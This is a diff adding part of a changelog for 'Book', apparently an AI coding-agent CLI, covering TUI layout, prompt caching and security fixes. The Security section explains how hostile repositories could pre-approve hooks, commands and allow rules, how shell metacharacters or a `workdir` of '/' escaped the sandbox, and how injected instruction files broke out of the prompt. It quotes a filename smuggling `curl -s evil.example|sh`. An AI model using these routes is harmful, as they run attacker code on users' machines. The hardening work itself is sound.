|
1558
|
+
that many characters off its command and padded the columns back as spaces.
|
|
1559
|
+
- **Heading depth is legible again.** `mdHeadingH1` had been set to the body text colour, so with
|
|
1560
|
+
the `###` markers gone `# Title`, `### Sub` and a bold run of body copy all rendered identically.
|
|
1561
|
+
The three heading steps are now distinct in both built-in themes, and a test enforces it.
|
|
1562
|
+
|
|
1563
|
+
### Changed
|
|
1564
|
+
|
|
1565
|
+
- **The activity wording is shorter, funnier, and covers the whole tool set.** The row is one line
|
|
1566
|
+
and the label shares it with an elapsed time and a keyboard hint, so a phrase is only the frame —
|
|
1567
|
+
the target inside it, a path or a pattern or a shell command, is the part worth reading.
|
|
1568
|
+
`Peeking between the covers of` spent 29 of about 50 columns on the joke and then truncated the
|
|
1569
|
+
filename it was introducing; every phrase now fits a 28-column budget a test enforces, and the
|
|
1570
|
+
short ones land the gag sooner. The reasoning rotation grew from twelve lines to twenty-eight, so
|
|
1571
|
+
a minute of thinking no longer loops, and each line is a joke about thinking rather than a claim
|
|
1572
|
+
of progress the indicator cannot check. Phrases moved out of the switch into one catalog that can
|
|
1573
|
+
be read in a single sitting, and the tools that used to fall through to `Trying agent spawn on…`
|
|
1574
|
+
— the managed-agent and evidence families, `ToolSearch`, `ReadSkillResource`, `DismissShell` —
|
|
1575
|
+
now have their own. `ApplyPatch` names the file its envelope touches instead of saying
|
|
1576
|
+
`workspace files`, and a phrase that ends in a colon drops it when the call carries no target.
|
|
1577
|
+
The blocked labels stay plain: when the run has stopped to ask the reader for something, a joke
|
|
1578
|
+
is in the way.
|
|
1579
|
+
- **The plan block and the working line are now told apart at a glance.** The activity row used to
|
|
1580
|
+
set its wording in `text`, the same colour as body prose, plan steps and tool targets, so the one
|
|
1581
|
+
row that is actually changing was the hardest row to pick out: a moving glyph welded to a sentence
|
|
1582
|
+
that looked like every other sentence. The spinner glyph and its wording now share the spinner's
|
|
1583
|
+
own sage — the agent's voice — and read as a single live element, with the elapsed duration and
|
|
1584
|
+
the keyboard hint receding behind it in two quieter weights. Blocked and retrying rows keep their
|
|
1585
|
+
status colours, because those are not the agent talking. The plan takes clay, product chrome's
|
|
1586
|
+
hue, so the two blocks never compete. Its header carries a meter of one cell per step, a scale
|
|
1587
|
+
model of the rows beneath it, and the rows themselves run in three weights: finished steps struck
|
|
1588
|
+
through and receded, queued steps quiet, the step in flight the only one set in full text colour
|
|
1589
|
+
and bold. Plan markers moved off `○`/`◉`, which are East Asian _Ambiguous_ — terminals that draw
|
|
1590
|
+
them two cells wide swallowed the space behind them, so plan rows landed a column left of every
|
|
1591
|
+
other row and butted against their own marker — onto the `✓`/`›`/`·` vocabulary the rest of the
|
|
1592
|
+
TUI already renders one cell wide. A long step now truncates to the content measure instead of
|
|
1593
|
+
wrapping back under the marker column, where the overflow read as a new item.
|
|
1594
|
+
- **Zero-Mem is now an explicitly named experiment and is unavailable by default.** Production
|
|
1595
|
+
`compactStrategy` accepts only `summary`; the normal `/config` menu, `R` shortcut, and
|
|
1596
|
+
`/config compact-strategy` selector no longer expose Zero-Mem. Activation requires strict
|
|
1597
|
+
`BOOK_EXPERIMENTAL_ZERO_MEM=true`, `experimental.zeroMem: true` in the user-global
|
|
1598
|
+
`<BOOK_HOME>/settings.json`, or an explicit `--settings` document. Both workspace settings layers
|
|
1599
|
+
are withheld from enabling experimental capabilities so a clone cannot opt the user in, and local
|
|
1600
|
+
`/config`/`book config set` writes refuse the key rather than pretending it will take effect.
|
|
1601
|
+
Legacy `compactStrategy: "zero-mem"` and `BOOK_COMPACT_STRATEGY=zero-mem` selectors fail with
|
|
1602
|
+
migration guidance; explicitly enabled main-agent runs keep query-time retrieval while subagents
|
|
1603
|
+
retain summary compaction.
|
|
1604
|
+
- **The TUI now lays every row out on one grid, and the palette gives every role its own hue.**
|
|
1605
|
+
A transcript row is `[gutter][content]`: the gutter is two columns wide and carries status (a
|
|
1606
|
+
glyph, a rail, a spinner), and content always begins on the same column. Before this, each
|
|
1607
|
+
component picked its own `marginLeft` and its own `width - N` budget, so content landed on
|
|
1608
|
+
columns 1, 2, 4 and 5 and nothing could be scanned down. `src/tui/layout.ts` is the single
|
|
1609
|
+
source of truth; bordered surfaces (composer, menus, permission prompt) now sit flush at column
|
|
1610
|
+
0 so their border plus one column of padding lands their text on the same content column.
|
|
1611
|
+
- _Tool rows are three aligned columns_: `[verb] [target] … [meta]`, with metadata flush right
|
|
1612
|
+
so `8 lines`, `+3 -2` and `exit 1` line up down the transcript instead of trailing a
|
|
1613
|
+
`·`-chain. The verb is never truncated — a row whose label will not fit the column runs
|
|
1614
|
+
inline instead. A failing row may spend up to half its width on the error message, which
|
|
1615
|
+
previously got clipped to twenty columns while the command it failed on kept the rest.
|
|
1616
|
+
- _Consecutive tool rows no longer have a blank row between them_ (`toolRowGap` is 0, and the
|
|
1617
|
+
new `toolBlockGap` puts the breathing room before the block), so a run of actions reads as
|
|
1618
|
+
one column.
|
|
1619
|
+
- _A user turn opens with a labelled rule_ — `── you ─────── 10:55 ──` — replacing the tinted
|
|
1620
|
+
card with an accent rail. A transcript with no turn boundary is a wall of same-weight rows;
|
|
1621
|
+
this is the element that lets you find where an exchange began when scrolling back.
|
|
1622
|
+
- _Code blocks lost their four-sided border_ in favour of a left rail plus the code tint. The
|
|
1623
|
+
box was the heaviest element in an answer, wrapped around its smallest, and cost four columns
|
|
1624
|
+
where the rail costs two. Full borders are now reserved for surfaces that want your input.
|
|
1625
|
+
- _Headings carry hierarchy through weight and brightness_, not `═══ TEXT ═══` / `── text ──`
|
|
1626
|
+
side chrome, which competed with the turn rule and made an in-answer heading look like a
|
|
1627
|
+
transcript boundary. `# Heading` is no longer upper-cased.
|
|
1628
|
+
- _List markers are sized per list_ rather than to a fixed three columns, so a bullet no longer
|
|
1629
|
+
leaves a dead column and an ordered list does not shear its text between items 9 and 10.
|
|
1630
|
+
- **The palette separates roles that used to share one colour.** `#AFC19D` was simultaneously
|
|
1631
|
+
`brand`, `assistantAccent`, `modeDefault`, `mdHeadingH1`, `mdLink` and `usageMeter` — six
|
|
1632
|
+
semantically different things rendering identically. Sage now belongs to the agent, clay to
|
|
1633
|
+
product chrome and user-authored content, teal to references and the usage meter, and the
|
|
1634
|
+
amber/rust/green trio to status; `default` permission mode is desaturated so an agent turn never
|
|
1635
|
+
reads as a mode signal. Both the dark and light built-ins are checked for role distinctness by
|
|
1636
|
+
test rather than by pinned hex values.
|
|
1637
|
+
- **The status line leads with what matters and shows the branch.** `useGitStatus` existed with no
|
|
1638
|
+
consumer; the footer now shows the current branch and marks a dirty tree, leads with a mode chip
|
|
1639
|
+
in the mode's own colour, and always colours context pressure (previously grey until 80%, which
|
|
1640
|
+
left the whole row a flat monotone). Segments are separated by space rather than `·`, since
|
|
1641
|
+
colour now does that work.
|
|
1642
|
+
- **The transcript reads as a hierarchy instead of a flat list.** Tool rows and answer prose
|
|
1643
|
+
rendered at the same weight, so in a session that is mostly machinery the conclusion had to be
|
|
1644
|
+
hunted for. There is now a ramp: headings brightest, prose next, tool targets a step below, and
|
|
1645
|
+
verbs and directory prefixes dimmest. A path's basename outranks its directory, since twenty rows
|
|
1646
|
+
of `src/review/` are identical and the filename is what distinguishes them.
|
|
1647
|
+
- _A finished thought collapses to `▸ thought · 4 lines`._ Watching reasoning arrive is the point
|
|
1648
|
+
of showing it; re-reading it in scrollback is not. Expanded by default it put the least
|
|
1649
|
+
important content of a turn several rows above the first sentence of the answer. Live reasoning
|
|
1650
|
+
still streams in full, and detailed mode (Ctrl+O) reopens a finished one.
|
|
1651
|
+
- _The `answer ────────` divider is gone._ It announced the answer only when the turn happened to
|
|
1652
|
+
contain reasoning, and trailed a stub rule that went nowhere. Screen readers keep the spoken
|
|
1653
|
+
boundary, which they cannot infer from spacing.
|
|
1654
|
+
- _Byte counts and whole-file line ranges are gone._ `2 lines, 51 B` and `121 lines · 1-121` rode
|
|
1655
|
+
along on nearly every row; the range now appears only when a read started partway into a file.
|
|
1656
|
+
- _Churn counts are coloured_ — `+33` green, `-2` rust — so the figures a reader scans for are the
|
|
1657
|
+
ones that carry colour.
|
|
1658
|
+
- _A file edit is called `Edit` everywhere._ `deriveToolPresentation` said `Update` while the
|
|
1659
|
+
aggregate heading said `Edit`, so the measured label column disagreed with the rendered one.
|
|
1660
|
+
- _Label-column widths snap to 4, 6 or 10_ rather than each turn's exact widest label. Exact
|
|
1661
|
+
per-turn sizing closed the gulf inside a turn but left two adjacent turns on different columns.
|
|
1662
|
+
- **One grid owns every row's horizontal position.** On a wide terminal nothing bounded the row
|
|
1663
|
+
width, so right-aligned metadata ended up 170 columns from the command it described — aligned
|
|
1664
|
+
with nothing the eye could hold. The transcript, the composer and the status line now resolve
|
|
1665
|
+
their measure in one place instead of each picking its own. (Later in this release that measure
|
|
1666
|
+
was split: content follows the terminal, while floating panels and aligned tool rows stay bounded
|
|
1667
|
+
— see "The TUI uses the whole terminal" above, which is the end state.)
|
|
1668
|
+
- _The label column is sized per turn_ rather than to a fixed ten columns. A turn of `Bash` /
|
|
1669
|
+
`Read` / `Grep` rows left seven dead columns between every verb and its target.
|
|
1670
|
+
- _A failing row now takes as much width as its message needs_, capped, and never enough to
|
|
1671
|
+
push the target below a readable minimum. The previous half-the-width ratio clipped
|
|
1672
|
+
`'tail' is not recognized as an internal or external command` by one character.
|
|
1673
|
+
- _Reasoning tags beyond `<think>`_ (`<thinking>`, `<reasoning>`, `<reasoning_context>`) are
|
|
1674
|
+
recognized. An unhandled tag reached `marked` as raw markup, so the transcript grew a code
|
|
1675
|
+
block labelled `html` containing the model's private reasoning.
|
|
1676
|
+
- _Thinking blocks lost their fill_, keeping only the rail. Reasoning is the least important
|
|
1677
|
+
content in a turn and was rendering as the heaviest block on screen.
|
|
1678
|
+
- **Left rails now actually render.** Expanded tool output, blockquotes and thinking blocks each
|
|
1679
|
+
set `borderLeft` and a border colour but never a `borderStyle`, which Ink treats as no border at
|
|
1680
|
+
all — so `toolRail`, `mdBlockquoteBorder` and `mdThinkBorder` were configured and never drawn.
|
|
1681
|
+
Those blocks were indistinguishable from indented prose.
|
|
1682
|
+
- **The welcome screen no longer advertises commands that do not exist.** Hints were truncated per
|
|
1683
|
+
segment inside a row that also held fixed separators, so a 50-column terminal rendered
|
|
1684
|
+
`/hel commands` and `·@file`. Hints are now packed whole — the last one is dropped rather than
|
|
1685
|
+
clipped — and the tagline orients a first-run user instead of describing the product.
|
|
1686
|
+
|
|
1687
|
+
- **Anthropic sessions now cache the conversation, cutting input cost on long sessions by roughly
|
|
1688
|
+
an order of magnitude.** Book placed no cache breakpoint on the message stream, so the whole
|
|
1689
|
+
history — 50-150k tokens mid-session — was re-billed at full input price on every turn. A moving
|
|
1690
|
+
breakpoint on the newest message means a steady-state turn re-buys roughly the newest turn
|
|
1691
|
+
instead of the whole context; cache reads are about a tenth of the input price, and time to first
|
|
1692
|
+
token drops with the cost. Book also marked _every_ tool definition, far past Anthropic's
|
|
1693
|
+
four-breakpoint limit; only the last tool is marked now, which caches identically.
|
|
1694
|
+
- **The system prompt is now organized by how often its content changes.** Current date, git
|
|
1695
|
+
status, the plan-mode notice, and the todo list have left the system prompt: they sit ahead of
|
|
1696
|
+
the message history in the cache prefix, so a dirty file or a plan-mode toggle used to
|
|
1697
|
+
invalidate the entire conversation. Per-turn state is delivered as a `<session-state>` block on
|
|
1698
|
+
the newest user turn, and active skill frames moved from the cached prefix to the uncached
|
|
1699
|
+
dynamic suffix, so activating a skill no longer invalidates the whole prompt.
|
|
1700
|
+
- _Todo state now travels through TodoWrite's own tool result_, which already echoes the full
|
|
1701
|
+
list into the message stream. The list is no longer restated in the system prompt each turn.
|
|
1702
|
+
- _Checkpoint freshness_ is no longer re-stamped into the historical checkpoint message. The
|
|
1703
|
+
same hash comparison runs once per turn and reports drift as `Stale since checkpoint: …` in
|
|
1704
|
+
the newest session-state block.
|
|
1705
|
+
- **`SYSTEM_PROMPT_VERSION` is now `book-system-prompt-v2`.** Run-ambient records stamp this
|
|
1706
|
+
version, so harness evidence recorded under v1 is not comparable with v2-era runs. Evidence
|
|
1707
|
+
accumulated through a durability backend that claims `verified` is reset by this bump.
|
|
1708
|
+
- **Project instructions are fenced.** `CLAUDE.md` / `AGENTS.md` / rules content is wrapped in
|
|
1709
|
+
`<project-instructions>` with a `<source path scope>` element per file, and fence markup inside
|
|
1710
|
+
a source body is neutralized. Previously an injected file's own `#` headings broke straight out
|
|
1711
|
+
of the `## Project instructions` section, so a repo file containing `## Guardrails` rendered at
|
|
1712
|
+
the same level as the real one. Trust framing now precedes the fenced content instead of
|
|
1713
|
+
arriving in the closing guardrails.
|
|
1714
|
+
- **The system prompt states harness facts it never used to**: how output is rendered, the
|
|
1715
|
+
`file_path:line` convention, which shell Bash spawns per platform (`cmd.exe` on Windows, not a
|
|
1716
|
+
POSIX shell), what a denied tool call means, that hook output is user-configured feedback, and
|
|
1717
|
+
that time-sensitive facts need verifying. The machine hostname is no longer sent to the provider.
|
|
1718
|
+
- **The `## Available tools` section is gone.** It restated, with truncated descriptions, the tool
|
|
1719
|
+
schemas the API already delivers verbatim. The deferred-tool catalog remains, since it describes
|
|
1720
|
+
tools the model genuinely cannot see. Operating principles lost the bullets that restate a
|
|
1721
|
+
frontier model's own defaults.
|
|
1722
|
+
- **Truncated listings now say so.** Command and subagent listings that hit their character budget
|
|
1723
|
+
append `- …and N more not shown` instead of stopping silently after one bare name. The skills
|
|
1724
|
+
listing already reported its omissions.
|
|
1725
|
+
- **Node.js 22.13.0 or newer is now required** (previously 20). Node.js 20 reached end-of-life on
|
|
1726
|
+
2026-04-30, and 22.13.0 is where `node:sqlite` stopped requiring `--experimental-sqlite`. CI
|
|
1727
|
+
exercises Node.js 22 and 24 on Ubuntu and Windows.
|
|
1728
|
+
|
|
1729
|
+
### Security
|
|
1730
|
+
|
|
1731
|
+
- **A repository can no longer approve its own slash commands by committing
|
|
1732
|
+
`.book/settings.local.json`.** Project command approvals were the last of four
|
|
1733
|
+
repository-controlled input classes still read from inside the working tree. `.gitignore` does
|
|
1734
|
+
not stop a _tracked_ file from reaching a clone, so `git add -f .book/settings.local.json`
|
|
1735
|
+
shipped a project's own `commands.projectCommands` decisions with it — and because the
|
|
1736
|
+
fingerprint they carry is a digest of a body the repository also wrote, a hostile project could
|
|
1737
|
+
precompute a matching one and arrive pre-approved, releasing its shell on the first `/name` or
|
|
1738
|
+
`book -p "/name"`. Decisions now live in `~/.book/trust.json` alongside the MCP, allow-rule, and
|
|
1739
|
+
hook decisions, keyed by workspace path, and **both** workspace settings layers are stripped of
|
|
1740
|
+
the key. Record one with `book trust command <name>` (`--all-pending`, `--reject`, and
|
|
1741
|
+
`--workspace` all work as they do for `hook` and `rule`); `book doctor` prints the line for what
|
|
1742
|
+
is withheld. Approvals previously recorded in `.book/settings.local.json` are not migrated —
|
|
1743
|
+
reading them back to convert them is the same trust the move exists to withdraw — so each is
|
|
1744
|
+
asked once more, on the machine that decides.
|
|
1745
|
+
|
|
1746
|
+
- **`book config set` refuses the four trust-owned settings paths.** They are stripped from the
|
|
1747
|
+
layer `config set` writes, so `book config set commands.projectCommands …` — the line Book
|
|
1748
|
+
itself used to print — would report success and change nothing on the next load. It now exits
|
|
1749
|
+
non-zero and names the `book trust` command that records the decision instead. The refusal
|
|
1750
|
+
matches ancestors and descendants of each path, not just the exact key: replacing a whole
|
|
1751
|
+
section with `book config set commands '{"projectCommands":…}'` is the same silently-stripped
|
|
1752
|
+
write by another route.
|
|
1753
|
+
|
|
1754
|
+
- **A project command is never approved by name alone.** `book doctor` now lists each withheld
|
|
1755
|
+
command with the shell it would run, the way it already lists a withheld hook's command,
|
|
1756
|
+
matcher, and environment, and `book trust command --all-pending` prints each command's shell
|
|
1757
|
+
before recording the grant — a bulk decision against a list of names was approval without
|
|
1758
|
+
reading. A command's name is a filename the repository chose, so it is also now stripped of
|
|
1759
|
+
terminal control characters wherever it is displayed, and a name that is not a plain filename
|
|
1760
|
+
gets no copy-and-paste `book trust command <name>` line at all: a repository shipping
|
|
1761
|
+
``.book/commands/deploy`curl -s evil.example|sh`.md`` would otherwise have had its payload
|
|
1762
|
+
printed as a command to paste, and run by the act of approving.
|
|
1763
|
+
|
|
1764
|
+
- **The trust store version is now 2.** `projectCommands` is readable by a version-1 build, which
|
|
1765
|
+
is the problem: writes go through the schema, unknown keys are dropped, and a version-1 build
|
|
1766
|
+
recording any hook, rule, or MCP decision would silently erase that workspace's command
|
|
1767
|
+
approvals. A version-1 build now reports a version-2 store as unreadable, withholds every gated
|
|
1768
|
+
declaration, and declines to write, rather than quietly discarding decisions.
|
|
1769
|
+
|
|
1770
|
+
- **A checked-in slash command can no longer run shell on your machine just because you typed
|
|
1771
|
+
its name.** A `.book/commands/*.md` body may substitute shell output into its prompt, and that
|
|
1772
|
+
substitution ran before the model saw anything, outside the permission system and outside the
|
|
1773
|
+
sandbox — no rule consulted, no sandbox applied, nothing asked. Cloning a repository and
|
|
1774
|
+
invoking one of its commands was therefore arbitrary code execution, and print mode had widened
|
|
1775
|
+
the exposure: `book -p "/name"` reaches the same resolver with no terminal present to notice.
|
|
1776
|
+
Repository-declared commands that substitute shell now require a one-time decision, recorded in
|
|
1777
|
+
`~/.book/trust.json` and keyed by workspace path, so nothing inside the working tree can answer
|
|
1778
|
+
for it. Until a
|
|
1779
|
+
decision exists the command is refused, naming the shell it wanted to run and the command that
|
|
1780
|
+
approves it; `book doctor` lists what is withheld. The recorded fingerprint covers the shell a
|
|
1781
|
+
body runs, not the prose around it, so editing what runs asks again while rewording the
|
|
1782
|
+
instructions does not. Commands in `~/.book/commands/` are yours and are never gated, and a
|
|
1783
|
+
project command that substitutes no shell is unaffected.
|
|
1784
|
+
|
|
1785
|
+
- **Slash-command shell output is no longer rescanned for further substitution.** Fenced blocks
|
|
1786
|
+
were resolved first and the _result_ was then scanned for inline ``!`cmd` `` spans, so a block
|
|
1787
|
+
whose output contained an injection marker had it executed as a second command. Spans are now
|
|
1788
|
+
taken from one scan of the original body and output is substituted back without rescanning —
|
|
1789
|
+
which is also what lets an approval fingerprint mean exactly what will run.
|
|
1790
|
+
- **A repository can no longer widen your permissions by shipping a `permissions.allow` rule.**
|
|
1791
|
+
Allow rules accumulate across settings layers, so a rule in a cloned repository's checked-in
|
|
1792
|
+
`.book/settings.json` joined the effective allow list — reaching the outcome that project layers
|
|
1793
|
+
are already forbidden from selecting via `defaultMode: bypassPermissions`. Once merged a rule
|
|
1794
|
+
carried no provenance, so nothing downstream could tell a repository's grant from your own. Such
|
|
1795
|
+
rules are now withheld until you record a decision, stored per workspace in `~/.book/trust.json`.
|
|
1796
|
+
`ask` and `deny` rules are unaffected: they only ever restrict. `book doctor` lists what is
|
|
1797
|
+
withheld and prints the `book trust rule` command that grants it.
|
|
1798
|
+
|
|
1799
|
+
- **A repository can no longer run shell commands through project-declared hooks without your
|
|
1800
|
+
approval.** A `hooks.<event>` entry in a cloned repository's checked-in `.book/settings.json`
|
|
1801
|
+
is a command Book executes at lifecycle events — on every prompt, around every tool call, at
|
|
1802
|
+
session start. Once merged into resolved settings an entry carried no provenance, so nothing
|
|
1803
|
+
downstream could tell a repository's hook from your own. Project-declared entries are now
|
|
1804
|
+
withheld until you record a decision, stored per workspace in `~/.book/trust.json` and keyed by a
|
|
1805
|
+
fingerprint of the event, matcher, command, and env — editing any of those reverts the hook to
|
|
1806
|
+
untrusted. User-global and local-layer hooks are unaffected. Print/headless and SDK runs report
|
|
1807
|
+
what they are skipping, and `book doctor` lists each withheld hook — command, matcher, and
|
|
1808
|
+
environment, since approval covers all three — and prints the `book trust hook` command that
|
|
1809
|
+
grants it.
|
|
1810
|
+
|
|
1811
|
+
- **Trust decisions moved out of the workspace, into `~/.book/trust.json`.** `mcp.projectServers`,
|
|
1812
|
+
`permissions.projectAllowRules`, and `hooks.projectEntries` recorded your answer about
|
|
1813
|
+
repository-controlled input, and were read from `.book/settings.local.json` on the reasoning that
|
|
1814
|
+
the file is gitignored. `.gitignore` does not stop a _tracked_ file from reaching a clone:
|
|
1815
|
+
`git add -f .book/settings.local.json` ships it with the repository, and every fingerprint the
|
|
1816
|
+
store is keyed by is a digest of configuration the repository already controls. A hostile project
|
|
1817
|
+
could therefore precompute approvals for the hooks, servers, and allow rules it also shipped and
|
|
1818
|
+
arrive pre-trusted — releasing arbitrary shell commands on first run. All three keys are now
|
|
1819
|
+
ignored from **both** workspace layers and read from a user-global store keyed by absolute
|
|
1820
|
+
workspace path, which nothing a repository can write reaches. An unreadable or off-schema store
|
|
1821
|
+
records no decisions, withholding the gated input rather than releasing it, and a write refuses
|
|
1822
|
+
rather than overwrite a store it could not parse. Decisions recorded under the old scheme are not
|
|
1823
|
+
migrated — that would import exactly the approvals this closes — so a project whose hooks or
|
|
1824
|
+
servers you had already approved asks once more.
|
|
1825
|
+
|
|
1826
|
+
- **New `book trust` subcommand records those decisions**: `book trust hook <fingerprint>` and
|
|
1827
|
+
`book trust rule <rule>`, each taking `--all-pending`, `--reject`, and `--workspace <path>`.
|
|
1828
|
+
`book doctor` printed a `book config set hooks.projectEntries '<json>'` one-liner to paste, which
|
|
1829
|
+
was wrong three ways: `config set` _replaces_ the value at a path and the printed map held only
|
|
1830
|
+
the newly pending entries, so running the suggestion silently revoked every earlier approve and
|
|
1831
|
+
reject; the command omitted `--workspace`, so running it anywhere but the diagnosed directory
|
|
1832
|
+
wrote the decision into the wrong project; and its single-quoted JSON does not survive `cmd.exe`,
|
|
1833
|
+
where quotes are literal and the argument reached validation as a string. Decisions are now
|
|
1834
|
+
recorded one at a time, a fingerprint needs no quoting, and doctor names the workspace it
|
|
1835
|
+
diagnosed. Repository-authored text in that report — commands, matchers, environment values — is
|
|
1836
|
+
escaped before printing, so a hook cannot use newlines or ANSI escapes to forge a report line and
|
|
1837
|
+
pass itself off as already approved.
|
|
1838
|
+
|
|
1839
|
+
- **Print/headless and SDK runs no longer report withheld project declarations under
|
|
1840
|
+
`--no-settings`.** Both hosts read `.book/settings.json` off disk unconditionally and compared it
|
|
1841
|
+
against the resolved decision store, which under `--no-settings` is the empty default: a run in a
|
|
1842
|
+
repository with project hooks announced that it was ignoring hooks pending approval, when the
|
|
1843
|
+
hooks were skipped because settings layers were disabled and approving them would change nothing.
|
|
1844
|
+
Already-approved hooks were reported as pending for the same reason.
|
|
1845
|
+
|
|
1846
|
+
- **`connectMcpServers()` now fails closed when no host has adjudicated approval.** Called without
|
|
1847
|
+
an explicit server list it resolved every declared server — user-global _and_ repository-declared
|
|
1848
|
+
— and connected them all, so the project-server approval gate held only because each caller
|
|
1849
|
+
remembered to pass an approved subset. It now connects user-scoped servers only and reports each
|
|
1850
|
+
project-declared server it refused, by name and config path. No shipped caller changes behavior:
|
|
1851
|
+
the TUI, headless, and SDK paths all supply an explicit list already. What changes is that a
|
|
1852
|
+
future caller cannot reach a repository-controlled server by omitting an argument.
|
|
1853
|
+
|
|
1854
|
+
- **`permissions.deny` rules now hold in every permission mode.** The hard-deny check ran only for
|
|
1855
|
+
file-mutating tools, and `auto` and `bypassPermissions` skip the permission block entirely — so
|
|
1856
|
+
in those two modes a deny rule was enforced for `Write` and `Edit` and silently ignored for
|
|
1857
|
+
everything else. `deny: ["Bash(rm *)", "Write(.env)"]`, the pair in the README's own settings
|
|
1858
|
+
example, was half-enforced under `--permission-mode auto`: the `Write` rule blocked, the `Bash`
|
|
1859
|
+
rule matched nothing. The deny check now runs for every tool ahead of the mode logic, so a rule
|
|
1860
|
+
the user already wrote is applied whether or not the mode would have prompted. Modes still decide
|
|
1861
|
+
only what happens to calls no deny rule matched.
|
|
1862
|
+
- **The Bash sandbox now actually contains the command it wraps.** The bubblewrap invocation was
|
|
1863
|
+
joined into a single string and spawned with `shell: true`, so the host shell re-parsed the whole
|
|
1864
|
+
wrapper — including the user's unquoted command — before bubblewrap ever ran. Any metacharacter
|
|
1865
|
+
(`;`, `&&`, `|`, `$(…)`, a backtick) split at the outer level and executed on the host, outside
|
|
1866
|
+
the sandbox; a workspace path containing a space broke the invocation outright. Sandboxed
|
|
1867
|
+
commands are now spawned as a direct argument vector with `shell: false`, and the command reaches
|
|
1868
|
+
`/bin/bash -c` inside the sandbox as one argv element. Shell syntax still works — it is parsed by
|
|
1869
|
+
the shell _inside_ the namespace. This covers all three spawn paths: foreground `Bash`, session
|
|
1870
|
+
background shells, and persistent jobs through the detached runner.
|
|
1871
|
+
- **Declared sandbox filesystem and network policy is now enforced instead of ignored.**
|
|
1872
|
+
`sandbox.filesystem.allowWrite`, `denyWrite`, and `denyRead` were accepted by the schema and
|
|
1873
|
+
never read; the builder took the settings as an unused parameter and always emitted
|
|
1874
|
+
`--share-net`. They now render as `--bind`, `--ro-bind`, and masking `--tmpfs` mounts applied
|
|
1875
|
+
after the workspace bind so explicit policy wins. Because bubblewrap has no per-domain
|
|
1876
|
+
filtering, any `sandbox.network` domain rule now fails closed to `--unshare-net` with a warning
|
|
1877
|
+
rather than silently granting the full host network.
|
|
1878
|
+
- **The sandbox binds the workspace root, not the caller's `workdir`.** `workdir` is a
|
|
1879
|
+
model-supplied `Bash` argument, and it used to be the directory the sandbox mounted writable.
|
|
1880
|
+
Combined with the mount reordering below, `workdir: "/"` would have emitted `--bind / /` after
|
|
1881
|
+
every default mount, shadowing all of them and returning the entire host filesystem read-write
|
|
1882
|
+
while the output was still labelled `[sandboxed]`. A sandboxed command whose `workdir` resolves
|
|
1883
|
+
outside the workspace is now rejected; extra directories go through `sandbox.filesystem.allowWrite`.
|
|
1884
|
+
- Sandboxed commands run with `--die-with-parent` so a contained tree cannot outlive the process
|
|
1885
|
+
that spawned it. `--new-session` is deliberately not used: it calls `setsid()`, which moves the
|
|
1886
|
+
sandbox into its own process group, and every teardown path (`KillShell`, foreground timeout,
|
|
1887
|
+
Ctrl-C) signals the group Node created and confirms death with `kill(-pgid, 0)` — the group would
|
|
1888
|
+
have read as empty while the command kept running.
|
|
1889
|
+
- Fixed a mount-ordering bug that made the workspace read-only or invisible when it lived under a
|
|
1890
|
+
system prefix or under `/tmp`: the workspace bind was emitted before the read-only system binds
|
|
1891
|
+
and the `/tmp` tmpfs, which then shadowed it. The workspace is now bound after both.
|
|
1892
|
+
- `sandbox.filesystem.denyRead` masks a file with `/dev/null` and a directory with a tmpfs. Using
|
|
1893
|
+
a tmpfs for both would have aborted every sandboxed command with `Can't mkdir …: Not a directory`
|
|
1894
|
+
whenever the denied path was a file — which is the most natural thing to deny.
|
|
1895
|
+
- `sandbox.filesystem` entries may start with `~`, which is now expanded. Previously `~/.ssh`
|
|
1896
|
+
resolved to a nonexistent `<cwd>/~/.ssh` and was skipped in silence, leaving the path unprotected
|
|
1897
|
+
while the setting suggested otherwise. Unapplicable entries are now reported at startup and by
|
|
1898
|
+
`book doctor`, which also prints the policy the sandbox is actually enforcing.
|
|
1899
|
+
- The persistent job runner refuses to start a spec whose `sandboxed` flag disagrees with the
|
|
1900
|
+
presence of a sandboxed argv, instead of silently running the command unconfined.
|
|
1901
|
+
- **`sandbox.allowUnsandboxedCommands` and `sandbox.autoAllowBashIfSandboxed` are enforced instead
|
|
1902
|
+
of merely validated.** Both keys were accepted by the settings schema and read by nothing:
|
|
1903
|
+
sandboxing granted no permission auto-allow, and `allowUnsandboxedCommands: false` refused
|
|
1904
|
+
nothing, which left `sandbox.excludedCommands` as the only sandbox setting that had any effect.
|
|
1905
|
+
Both now decide from one shared predicate — will this exact command really execute inside a
|
|
1906
|
+
bubblewrap namespace? — so they cannot disagree about a command. `allowUnsandboxedCommands: false`
|
|
1907
|
+
refuses any `Bash` command that would run outside the sandbox, covering all three escapes
|
|
1908
|
+
(sandboxing off, an `excludedCommands` match, a missing backend), and the refusal names the
|
|
1909
|
+
setting and the specific reason rather than denying bare. `autoAllowBashIfSandboxed: true` skips
|
|
1910
|
+
the prompt only for a command that genuinely runs inside the sandbox, and only in place of the
|
|
1911
|
+
_default_ ask: `permissions.deny` is evaluated first and is never softened, an explicit
|
|
1912
|
+
`permissions.ask` rule still prompts, and any configured deny/ask rule at all keeps the default
|
|
1913
|
+
ask — a shell line escapes a glob far too easily for the rules that happened to match to be the
|
|
1914
|
+
whole protection. `sandbox.enabled` still defaults to `false`, so nothing changes for anyone who
|
|
1915
|
+
has not opted into sandboxing. `book doctor` now prints the effective — not merely configured —
|
|
1916
|
+
state of both keys alongside the `excludedCommands` count, reporting an auto-allow that cannot
|
|
1917
|
+
bite as inert instead of as enabled policy.
|
|
1918
|
+
- Raised the `postcss` override from `8.5.18` to `8.5.26`, clearing CVE-2026-69153
|
|
1919
|
+
(GHSA-fxqj-rqcc-2cmp, moderate): an attacker-controlled `sourceMappingURL` could read arbitrary
|
|
1920
|
+
`.map` files when `opts.from` was unset. `postcss` is a build-time-only transitive dependency of
|
|
1921
|
+
`tsup` and `vite`, so no shipped runtime code was affected. The pin, added for CI dependency
|
|
1922
|
+
stability, was holding `postcss` below the `^8.5.25` floor `vite` already declares; it stays an
|
|
1923
|
+
exact pin.
|
|
1924
|
+
|
|
1925
|
+
### Fixed
|
|
1926
|
+
|
|
1927
|
+
- **`--workspace` acted on the current directory instead, in whichever placement you used.** The
|
|
1928
|
+
root command and every subcommand both declare `-w/--workspace`; under commander 15 a `-w`
|
|
1929
|
+
following a subcommand is routed to the root, leaving the subcommand on its `process.cwd()`
|
|
1930
|
+
default. `book doctor`, `config`, `mcp`, and `tool-stats` all reported on the wrong directory, and
|
|
1931
|
+
`book config set --workspace <path>` wrote settings into the current one. Enabling positional
|
|
1932
|
+
option parsing fixes the after-subcommand placement, but it splits the two placements across
|
|
1933
|
+
different command objects, so `book --workspace <path> <subcommand>` was still silently ignored —
|
|
1934
